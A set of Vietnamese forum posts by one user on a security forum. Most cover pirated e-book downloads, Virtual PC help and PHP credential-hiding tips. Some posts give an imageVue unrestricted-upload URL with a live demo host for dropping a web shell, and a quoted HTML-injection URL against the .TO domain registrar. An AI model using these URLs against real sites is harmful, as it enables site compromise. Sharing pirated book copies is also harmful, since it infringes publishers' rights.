Messages posted by: buicathung

Ko biết liệu cuốn bạn tìm có phải là cuốn "Theory of Fuzzy Differential Equations and Inclusions" hay ko? :? smilie

bạn có thể download tại đây nếu link trên ko download được:

http://hosting-jazz.com/share/Linux Complete Command Reference.rar

Password unrar : yhp

Thêm một cuốn Linux (Hacking Exposed) cho mọi người đọc:
( sách khá cũ lại scan cho nên hơi nặng ... )

http://hosting-jazz.com/share/helinux.zip

Xoá hết của nó đi thì toi là phải rồi ... smilie

Boot sao được. Bạn chỉ nên add thêm các file của bạn thôi. ^^ chứ ko nên xoá các file trong đĩa khi mà bạn không hiểu chức năng của nó.
^^ Ngoài ra bạn cũng có thể dùng phần mềm Active@ Boot Disk Pro, Nero ... để tạo đĩa boot.

Bạn có thể download Ebooks For Dummies tại đây:
http://www.flazx.com/series/fordummies.php
Ngoài ra còn rất nhiều các loại sách khác bạn có thể tìm tại đây. VD như :
O'Reilly Nutshell
http://www.flazx.com/series/nutshell.php
Sams Teach Yourself
http://www.flazx.com/series/teachyourself.php
v.v...
^^ Nói chung đây là một kho sách khá phong phú dành cho IT
Nếu ai ko thể download được xin reply tại đây mình sẽ download giùm.

Firewall Fundamentals

http://hosting-jazz.com/share/Cisco.Press.Firewall.Fundamentals.Jun.2006.rar

Configuring SonicWALL Firewalls

http://hosting-jazz.com/share/Syngress.Configuring.SonicWALL.Firewalls.Apr.2006.eBook-DDU.rar

Password unrar : yhp

lonely_Xorhandsome wrote:

em cũng chưa test qua topic của anh nhưng em cũng thử ở 1 số forum cho up cả shell lên ( bất kỳ file nào dưới X kb)nhưng khi truy cập shell thì bị file image.php xử lý và view ra code không !

Tuỳ từng loại mã nguồn bạn ạ. Mỗi loại mà nguồn sẽ có một cách xử lý các file upload khác nhau. VD như IBF bạn có thể upload file PHP lên nhưng nó sẽ được lưu dưới dạng khác và khi bạn download nó sẽ có một quá trình sử lí ngược lại để bạn được file như ban đầu bạn upload lên.
Nhưng với một số loại khác thì bạn có thể upload file nên với nguyên dạng ban đầu của nó giống như file khi bạn upload lên.
Để chính xác thì bạn nên download mã nguồn của từng loại về test ( nếu có thể ) như vậy bạn sẽ hiểu rõ hơn.

lonely_Xorhandsome wrote:

buicathung wrote:
Bạn có thể download imageVue ở đây để test : www.imagevuex.com
Lỗi ở các phiên bản là cho phép bạn upload thỏa mái mà không phải chịu bất kì kiểm tra nào ...

Code:
http://[target]/imageVue/admin/upload.php?path=[directory]
Demo :

Code:
http://imagevuex.inn.no/imagevue/admin/upload.php?path=[directory]
loại forum này trước đây em cũng có up shell qua rồi nhưng khi thực thị nó thì bị 1 file trung gian image.php nó xử lý .... xử lý làm sao toàn ra code không !! em nhớ là đã hỏi mấy anh trong HVA thì có người bão server config kỹ ... nếu có lỗi thì không tới lượt em hack ....ect..ect ) ,rốt cục anh cũng post cái nội dung này lên rồi , vị nào trã lời topic trước đây của em nghĩ sao nhỉ

Mình xin trả lời bạn một số vấn đề:
- Trong imageVue ko hề có một file nào để xử lý image.php và lỗi này cũng hoàn toàn ko liên quan tới 1 file nào có tên là image.php
- Đây là mã nguồn của Album chứ ko phải là 4rum
Bạn có thể download bản mình test ở đây để biết thêm chi tiết

http://hosting-jazz.com/share/imageVu.rar

Password unrar:yhp

^^ CD khá lâu rồi mọi thứ trong CD chỉ có tính chất kham khảo ... Tớ thấy đĩa này ở ngoài cửa hàng CD có đầy đủ từ mấy năm trước rùi. Ai ko load được có thể ra ngoài cửa hàng bán CD để tìm mua ...

xtuoiyeux wrote:

Em hiện tại đang sử dụng VP2004 để cài PC ảo trong máy tính của mình, nhưng khi tao xong và chọn hệ điều hành và "Start" thì nó ra 2 một dòng thông báo, khi em ấn Enter thì nó vẫn thông báo như thế!
Vậy em cần phải làm những gì để có thể sử dụng chương trình VP2004
Và em có thể sử dụng nó như thế nào xin chỉ giáo giúp em
Cảm ơn các anh rất nhiều

Khi sử dụng Virtual PC nói chung và Virtual PC2004 nói riêng bạn nên chú ý:
- smilie

Có một số chương trình như VMware thì sau khi tạo file lưu trữ cho Virtual PC thì bạn phải tiến hành định dạng lại ổ như một ổ đĩa mới thực sự. Sau đó bạn mới có thể tiến hành cài đặt HĐH lên máy ảo.
- Một số trình khác như "Connectix Virtual PC" thì sau khi tạo file lưu trữ cho Virtual PC bạn có thể sử dụng để cài đặt HĐH ngay mà không phải định dạng lại ổ.
- Trong quá trình tạo máy ảo bạn chọn HĐH sử dụng là Linux, Windows XP, Windows 98, 2000 v.v.... thì không có nghĩa là khi bạn khởi động máy ảo bạn có thể sử dụng HĐH được ngay mà bạn vẫn phải tiến hành cài đặt HĐH một cách bình thường như một PC mới thực sự.

Vì không có thông lỗi cụ thể cho nên mình chỉ có thể đưa ra một số lưu ý khi sử dụng Virtual PC.

Hacking Exposed Web Applications

http://hosting-jazz.com/share/Hacking.Exposed.Web.Applications.rar

password unrar:yhp

Cuốn HE4 thì hiện nay tớ chỉ có sách thôi chứ ko có EBooks. Nếu bạn muốn có sách HE5 thì bạn có thể đăng kí nhận sách trong đợt offline sắp tới của HVA.

channhua wrote:

Em vào search mấy bài, không thấy trong search engine có mục tìm theo tác giả, BQT thấy có bất tiền không. search engine của 4 rum nào cũng có chức năng này sao 4 rum mình không có ?

Nhiều lúc muốn tìm 1 bài mà ra 1 đống muốn filter tác giả cho lẹ và chính xác. các anh add thêm nhé

Em nghĩ chức năng này cũng nên có. Vì giả sử bây giờ em muốn tìm một bài viết của anh Comale về một chủ đề nào đó. Nhưng số lượng bài viết của anh comale rất lớn và khả năng tìm kiếm lúc này lại trở thành rất vất vả.

loavoid wrote:

muốn phòng chống tất nhiên mình phải biết hacker tấn công mình như thế nào thì mới phòng chống được chứ, đúng ko, với lại đề tài mình là về phòng chống tấn công DDoS chứ ko phải tấn công DDoS, nên phần cách thức tấn công chỉ là phụ thôi, muốn giải quyết 1 vấn đề thì phải đưa ra vấn đề trước và hiểu đối thủ thực hiện như thế nào thì mình mới đưa ra được phuơng pháp hiệu quả. Chắc bạn nghĩ mình muốn hỏi sử dụng vào mục đích tấn công các website khác à

Đề tài của bạn là về "Phòng chống tấn công DDoS" theo tớ thì bạn đầu tiên bạn nên tìm hiểu nguyên lí của nó. Khi bạn hiểu được nguyên lý bạn có thể xây dựng được một mô hình tấn công và phòng chống DDoS mà không nhất thiết phải thực hiện một cuộc tấn công thật.
Tài liệu về DDoS trên internet khá nhiều bạn có thể lên google search với từ khóa "DDoS" hoặc "Denial of Service Attack" ....
Riêng về phần tớ tớ thấy bài viết trên HVA là khá đầy đủ. Bạn có thể xem ở đây:
http://hvaforum.net/hvaonline/jforum.html?module=search&action=search&openModeration=0&search_keywords=DDoS&search_terms=all&sort_dir=DESC&sort_by=p.post_time&start=50

Hoặc bạn có thể kham khảo cuốn "Internet Denial of Service: Attack and Defense"
Download tại :

http://hosting-jazz.com/share/Internet_Denial_of_Service_Attack_and_Defense_Mechanisms.rar

Password unrar: yhp

baothu wrote:

buicathung wrote:

baothu wrote:

bác nè cúng ý tưởng với em,đổi tên biến chứa info truy cập vào mysql và Zend toàn bộ source.Xong,attacker pó chiếu

cũng chưa hẳn bó chiếu vì nếu như attacker nếu có thể view được source của bạn(local) thì khả năng vẫn là cao. Thì thực ra trên biến là khác nhưng vị trí của nó thì vẫn ở đó thôi. Cái này nói gì thì nói cũng chỉ đánh lừa được những tay mơ. Chỉ có thể giảm thôi chứ ko thể tránh được hoàn toàn

view source nhưng Zend hết rồi thì làm seo :lol

Thường thì chẳng thằng cu nào Zend hết toàn bộ source từ a-->z. smilie

Vì nếu vậy nhiều khi nó chạy sẽ ko chuẩn.
smilie

Tuy nhiên có một cách khác.
giả sử bạn có 2 file a.php và b.php chứa các biến nhạy cảm. Bạn tạo 2 ra 2 file a.php và b.php mới include 2 file a.php và b.php rồi zend lại. Sau đó đáp mấy file a.php và b.php gốc kia ra ngoài thư mục www smilie

như vậy khả năng bảo mật sẽ cao hơn smilie

Hơi điên rồ tí ... smilie

baothu wrote:

bác nè cúng ý tưởng với em,đổi tên biến chứa info truy cập vào mysql và Zend toàn bộ source.Xong,attacker pó chiếu

cũng chưa hẳn bó chiếu vì nếu như attacker nếu có thể view được source của bạn(local) thì khả năng vẫn là cao. Thì thực ra trên biến là khác nhưng vị trí của nó thì vẫn ở đó thôi. Cái này nói gì thì nói cũng chỉ đánh lừa được những tay mơ. Chỉ có thể giảm thôi chứ ko thể tránh được hoàn toàn smilie

he he ^^ coi topic này ... có vẻ xôm dữ ... smilie

Hi hi thực ra thì với những cách mọi ngừoi đã nêu trên chỉ cần inlucde file index vào rồi gọi đích xác tên biến chứa username + password của data thì vẫn khả năng bị mất data vẫn là cao.
^^ BCH thì làm hơi mất công một chút ...
Với những thằng open source mình thay đổi tên biến của nó đi ^^ dùng một trình edit nào đó search toàn bộ trong code và thay đổi nó rồi zend lại smilie

như vậy là "móm"...
Ví dụ :
Code:

$INFO['sql_database'] = 'bch';
$INFO['sql_user'] = 'bch';
$INFO['sql_pass'] = 'bch4rum';

đồi thành:

Code:

$INFO['database'] = 'bch';
$INFO['user'] = 'bch';
$INFO['pass'] = 'bch4rum';

chẳng hạn ^^ ....
p/s: Như em nói mấy cái này rất mất thời gian ... smilie

cho nên các bác khỏi kêu ca về việc này nhá

^^ Thường mấy thằng cha DDoS thường sử dụng một nơi riêng biệt để đặt code DDoS sau đó đặt frame ở các trang Web có lựợng truy cập lớn. Khi coi log thì chỉ thấy được nơi đặt code thôi chứ khả năng tìm đựơc nơi đặt frame thường là rất thấp. ^^ .
^^ Hi hi có thể thằng này gà hay vờ như ko biết chăng lại đặt trực tiếp code DDoS lên hosting đang sử dụng ..

^^ nếu bạn quét trực tiếp trên hệ điều hành bạn đang chạy khi dính virus thì khả năng bạn diệt được là rất thấp ...
Bạn có thể dùng một hệ điều hành khác "sạch hơn" để quét virus hoặc quét virus từ dos. Cách đơn giản nhất là bạn boot từ CD sau đó vô dos để quét virus.

Bạn có thể download imageVue ở đây để test : www.imagevuex.com
smilie

Lỗi ở các phiên bản là cho phép bạn upload thỏa mái mà không phải chịu bất kì kiểm tra nào ...

Code:

http://[target]/imageVue/admin/upload.php?path=[directory]

Demo :

Code:

http://imagevuex.inn.no/imagevue/admin/upload.php?path=[directory]

edit

--------
p/s nếu thấy loằng ngoằng thì lên đây cũng được :
http://www.rapiddownloader.net/

^^ Em tình cờ nhặt được trên mạng.
For Firefox:

* First go to
Code:

http://addons.mozilla.org/firefox/59/

* Click Install Now to install addon.
* Restart FF. Tool-->User Agent Switcher--->Options--->Options
* Click User Agents--->Add
* Type this:
+ Description: MEGAUPLOAD
+ User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar)
* Click OK twice to finish adding User Agent.

From now, before downloading any file on megaupload just go Tools--> User Agent Switcher--->MEGAUPLOAD.

Quote:
For IE:

* Start/run->> type regedit -> ok
* Go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Mic*ft\Wi ndows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]

Note: if U use IE 7

go to: [HKEY_LOCAL_MACHINE\SOFTWARE\Mic*ft\Wi ndows\CurrentVersion\Internet Settings\User Agent\Post Platform]
* Right click on Post Platform --> New --> String Value --> type Alexa Toolbar --> ok

(nguồn Milworm)

hack2prison wrote:

I have detectd a security hole in Tonga domain management system (.TO). I reported Tonic.to and they fixed 2 time but it still exploit now.
Attacker can use this to hack any domain .TO. After you login with your account, you can change password of other accounts.

Code:
http://www.tonic.to/%3Cbody%20bgcolor=%22black%22%3E%3Cbr%3E%3Cbr%3E%3Cbr
%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ccenter%3E%3Cfont%20color=%22white
%22%20size=%2220%22%3E%3Ca%20href=http://vnbrain.net%3EHACK2PRISON%3C/a%3E%3C/font%3E
Some country use same source code may be attacked, ex: vunic.vu

Con này ngày xưa dính lỗi ko kiểm tra session. Nhưng hình như sau đợt report của lão H2P hình như nó fix rồi thì phải. smilie

xin bổ xung 1 chút:
với 2.0.x mở file sources/login.php
với 2.1.x mở file sources/action_public/login.php